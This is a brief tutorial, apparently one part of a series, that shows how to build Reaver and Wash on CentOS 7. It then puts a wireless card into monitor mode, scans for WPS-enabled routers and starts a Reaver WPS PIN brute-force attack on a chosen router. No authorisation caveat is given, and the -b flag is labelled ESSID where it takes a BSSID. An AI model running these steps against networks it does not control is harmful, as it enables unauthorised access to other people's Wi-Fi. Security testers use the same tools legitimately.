In part 3, I show how to install Reaver/Wash on CentOS 7.
Preparation
- CentOS 7 installed and started
- Aircrack-ng installed
- SSH access (optional)
Installation
# download reaver and wash
$ wget https://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
# unzip
$ tar -zxvf reaver-1.4.tar.gz
# install reaver and wash
$ cd /reaver-1.4/src
$ ./configure
$ make install
# optional read docs
$ cat /reaver-1.4/docs/README.REAVER
$ cat /reaver-1.4/docs/README.WASH
Usage
# kill interfering processes
$ airmon-ng check kill
# set interface into monitor mode (my interface is wlp0s11u1)
$ airmon-ng start wlp0s11u1
# find WPS routers via wash
$ wash -I wlp0s11u1mon
# start reaver running
$ reaver -i wlp0s11u1mon -b <ESSID> -t 2 -vv